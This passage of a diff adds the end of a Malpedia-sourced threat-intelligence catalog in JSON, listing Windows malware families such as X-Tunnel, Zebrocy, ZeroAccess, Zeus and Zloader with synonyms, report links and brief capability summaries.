"https://malpedia.caad.fkie.fraunhofer.de/details/win.xp_privesc", + "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf" + ] + }, + "uuid": "33f97c52-0bcd-43f4-88bb-99e7da9f49ae", + "value": "XP PrivEsc (CVE-2014-4076)", + "description": "" + }, + { + "meta": { + "synonyms": [ + "nokian" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", + "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" + ] + }, + "uuid": "b255fd2c-6ddb-452f-b660-c9f5d3a2ff63", + "value": "xsPlus", + "description": "" + }, + { + "meta": { + "synonyms": [ + "xaps" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", + "https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/", + "https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf", + "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf", + "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/", + "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf" + ] + }, + "uuid": "53089817-6d65-4802-a7d2-5ccc3d919b74", + "value": "X-Tunnel", + "description": "" + }, + { + "meta": { + "synonyms": [ + "ShadowWalker" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/" + ] + }, + "uuid": "1d451231-8b27-4250-b3db-55c5c8ea99cb", + "value": "xxmm", + "description": "" + }, + { + "meta": { + "synonyms": [ + "KeyBoy" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.yahoyah", + "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" + ] + }, + "uuid": "a673b4fb-a864-4a5b-94ab-3fc4f5606cc8", + "value": "Yahoyah", + "description": "" + }, + { + "meta": { + "synonyms": [ + "bbsinfo", + "aumlib" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih", + "https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html" + ] + }, + "uuid": "81157066-c2f6-4625-8070-c0a793d57e18", + "value": "yayih", + "description": "" + }, + { + "meta": { + "synonyms": [ + "DarkShare" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus", + "https://www.youtube.com/watch?v=AUGxYhE_CUY" + ] + }, + "uuid": "1cc9d450-88cd-435c-bb74-8410d2d22571", + "value": "YoungLotus", + "description": "Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.\r\n\r\nPE timestamps suggest that it came into existence in the second half of 2014.\r\n\r\nSome versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).\r\n" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty", + "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/", + "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/" + ] + }, + "uuid": "c0e8b64c-bd2c-4a3e-addc-0ed6cc1ba200", + "value": "yty", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Zekapab" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy", + "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" + ] + }, + "uuid": "973124e2-0d84-4be5-9c8e-3ff16bb43b42", + "value": "Zebrocy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy_au3", + "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/" + ] + }, + "uuid": "4a5f2088-18cb-426a-92e2-1eb752c294c0", + "value": "Zebrocy (AutoIT)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou" + ] + }, + "uuid": "2211eade-4980-4143-acd7-5ecda26d9dfa", + "value": "Zedhou", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Max++", + "Smiscer" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess", + "https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/", + "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/", + "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html", + "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/", + "http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/", + "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/", + "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/", + "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html" + ] + }, + "uuid": "c7ff274f-2acc-4ee2-b74d-f1def12918d7", + "value": "ZeroAccess", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil", + "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil" + ] + }, + "uuid": "585f9f75-1239-4561-8815-c5ae033053a1", + "value": "ZeroEvil", + "description": "ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.\r\n\r\nIt first connects to a gate.php (version=). Upon success, an embedded VBS gets started connecting to logs_gate.php (plugin=, report=).\r\nSo far, only one embedded VBS was observed: it creates and starts a PowerShell script to retrieve all password from the Windows.Security.Credentials.PasswordVault. Apart from that, a screenshot is taken and a list of running processes generated.\r\n\r\nThe ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).\r\n" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot", + "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx" + ] + }, + "uuid": "9b0aa458-dfa9-48af-87ea-c36d1501376c", + "value": "ZeroT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Zbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus", + "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html", + "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html", + "https://www.secureworks.com/research/zeus?threat=zeus", + "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20", + "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf", + "https://nakedsecurity.sophos.com/2010/07/24/sample-run/", + "http://eternal-todo.com/blog/zeus-spreading-facebook", + "http://eternal-todo.com/blog/new-zeus-binary", + "http://eternal-todo.com/blog/detecting-zeus", + "https://www.mnin.org/write/ZeusMalware.pdf", + "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html", + "http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html", + "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html", + "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html", + "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html", + "https://zeustracker.abuse.ch/monitor.php", + "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html" + ] + }, + "uuid": "4e8c1ab7-2841-4823-a5d1-39284fb0969a", + "value": "Zeus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer" + ] + }, + "uuid": "768f1ae5-81a6-49f2-87c1-821c247b4bf3", + "value": "Zeus MailSniffer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx", + "https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/", + "https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/", + "https://securityintelligence.com/uk-banks-hit-with-new-zeus-sphinx-variant-and-renewed-kronos-banking-trojan-attacks/" + ] + }, + "uuid": "997c20b0-0992-498a-b69d-fc16ab2fd4e4", + "value": "Zeus Sphinx", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_ssl" + ] + }, + "uuid": "74fc6a3a-cc51-4065-bdd9-fcef18c988a0", + "value": "Zeus SSL", + "description": "The sample listed here was previously mislabeled and is now integrated into win.floki_bot. The family is to-be-updated once we have a \"real\" Zeus SSL sample." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zezin", + "https://twitter.com/siri_urz/status/923479126656323584", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4877" + ] + }, + "uuid": "38de079b-cc4c-47b0-b47f-ad4c013d8a1f", + "value": "Zezin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhcat", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "3c74a04d-583e-40ec-b347-bdfeb534c614", + "value": "ZhCat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhmimikatz", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "989330e9-52da-4489-888b-686429db3a45", + "value": "ZhMimikatz", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Zeus Terdot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader", + "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/", + "https://labs.bitdefender.com/2017/11/terdot-zeus-based-malware-strikes-back-with-a-blast-from-the-past/", + "https://www.arbornetworks.com/blog/asert/great-dga-sphinx/" + ] + }, + "uuid": "13236f94-802b-4abc-aaa9-cb80cf4df9ed", + "value": "Zloader", + "description": "A banking trojan first observed in October 2016 has grown into a sophisticated hacking tool that works primarily as a banking trojan, but could also be used as an infostealer or backdoor." + }, + { + "meta": { + "synonyms": [ + "gresim" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zoxpng", + "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf" + ] + }, + "uuid": "7078d273-8a2d-477a-b6d9-7313e22d9ad7", + "value": "ZoxPNG", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Sensocode" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell", + "https://blogs.cisco.com/security/talos/opening-zxshell", + "https://blogs.rsa.com/cat-phishing/", + "https://github.com/smb01/zxshell" + ] + }, + "uuid": "23920e3b-246a-4172-bf9b-5e9f90510a15", + "value": "ZXShell", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.zyklon", + "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html" + ] + }, + "uuid": "721e9af0-8a60-4b9e-9137-c23e86d75722", + "value": "Zyklon", + "description": "" + } + ], + "version": 1649, + "source": "Malpedia", + "name": "Malpedia", + "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e" }